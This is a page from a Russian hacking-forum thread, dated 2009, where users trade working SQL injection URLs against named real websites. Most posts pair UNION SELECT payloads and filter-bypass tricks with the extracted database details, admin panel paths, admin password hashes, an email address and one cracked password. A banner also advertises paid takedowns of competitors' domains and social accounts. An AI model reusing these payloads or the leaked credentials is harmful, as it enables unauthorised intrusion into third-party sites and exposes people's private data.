Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 732 из 1242

732

Опции темы

Поиск в этой теме

Опции просмотра

#7311

02.01.2009, 23:08

a.su.s

Познающий

Регистрация: 02.03.2008

Сообщений: 44

Провел на форуме:
366195

Репутация: 64

www.henleystandard.co.uk

Код:

http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

version() - 5.0.45
user() - hsta@localhost
database() - henleystanda

Таблицы:

Код:

henleystanda
adfeature_upsell
archive
archivemedia
breaking_news
comments
displayads
editorial
editorschoice
jobs
lineage  :) 
media
notices
registration
schools
schoolsnews

www.thepuckstopshere.co.uk

Код:

http://www.thepuckstopshere.co.uk/news.php?r=1&t=2&id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

version() - 4.0.27-standard-log
user() - dbo69748003@212.227.127.13
database() - db69748003

#7312

02.01.2009, 23:13

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

как обычно, еду...

Код:

http://www-hto.usc.edu/ppl/intro_page.phtml?id=-435+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

доступ к mysql.user=on
file_priv=on
magic_quotes=off

Код:

http://www.ittc.ku.edu/view_project.phtml?id=24/*%00*/+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

наглядный пример обхода фильтрации(ereg/eregi) благодаря ошибкам в пхп...

Последний раз редактировалось Iceangel_; 02.01.2009 в 23:19..

#7313

03.01.2009, 00:26

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Код:

http://www.wfsj.org/news/news.php?id=-110+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_encrypt(version(),0x73),0x73),9,10/*

4.1.7
админка:

Код:

http://www.wfsj.org/admin/

#7314

03.01.2009, 01:18

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Отправить сообщение для Gemini12 с помощью ICQ

Цитата:

Сообщение от a.su.s

http://www.thepuckstopshere.co.uk

Почти все, пальцем в небо...

Код:

http://www.thepuckstopshere.co.uk/news.php?r=1&t=2&id=-1+union+select+1,2,concat_ws(0x3a,id,pwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users--

это, судя по id, это админ, тока админку чето не нашел...

Цитата:

1:03f8b8f9005e0e23:c.p.valentine@open.ac.uk

Последний раз редактировалось Gemini12; 03.01.2009 в 01:21..

#7315

03.01.2009, 01:55

lexus5122

Новичок

Регистрация: 16.03.2007

Сообщений: 24

Провел на форуме:
145084

Репутация: 2

Цитата:

Сообщение от Gemini12

Почти все, пальцем в небо...

Код:

http://www.thepuckstopshere.co.uk/news.php?r=1&t=2&id=-1+union+select+1,2,concat_ws(0x3a,id,pwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users--

это, судя по id, это админ, тока админку чето не нашел...

Цитата:

http://www.thepuckstopshere.co.uk/logs/admin

- Админка

Цитата:

03f8b8f9005e0e23 - toast

- пароль

А вот логин...?

#7316

03.01.2009, 02:04

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от lexus5122

- Админка

- пароль

А вот логин...?

логин че то не нашел, я же вслепую тыкал, все перепробовал: user, username, login, name, user_name, user_login, login и т.д

Может у кого получится?

#7317

03.01.2009, 04:19

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

PageRank: 6
http://oia.pdx.edu/ea/programs/search.php?pid=-9111+union+select+1,2,3,4,5,6,7,8,concat_ws(0x2f,n ame,pass,mail),10,11,12,13,14+from+users+limit+1,4--

#7318

03.01.2009, 09:54

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Nbs.bg.ac.yu - PR8 ~3к

Цитата:

http://www.nbs.bg.ac.yu/view_file.php?file_id=-1562+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on()),8+from+cms_user/*

4 ветка..

Wosa.co.za - PR7 ~2.5к

Цитата:

http://www.wosa.co.za/sa/link_list.php?category=-4+union+Select+1,2,unhex(hex(version())),4,5,6+fro m+news/*

4 ветка..

C Новым 2009 )

Последний раз редактировалось sabe; 03.01.2009 в 10:12..

#7319

03.01.2009, 14:55

spherics

Участник форума

Регистрация: 14.01.2008

Сообщений: 174

Провел на форуме:
800953

Репутация: 443

Очаровательные пёсики Бульмастифы -)

Доступ закрыт но вывод есть в шапке -)

http://catalog.bullmast.ru/dog.php?screen=1&id=-5935+union+select+concat_ws(0x3a3a,version(),user( ),database()),2,3,4,5,6--

4.0.27-max-log
bullmast_mstf@v26.valuehost.ru
bullmast_mstf

http://catalog.bullmast.ru/dog.php?screen=1&id=-5935+union+select+concat_ws(0x3a3a,name,password), 2,3,4,5,6+from+users--

admin :: 8099d55d6551a908d0c0c379cde265b0

#7320

03.01.2009, 15:12

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

Караем УГ: Национальный университет Ганы

Код:

http://www.ug.edu.gh/index1.php?linkid=-1+union+select+concat_ws(0x3a,version(),user(),database())/*

Страница 732 из 1242

732

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход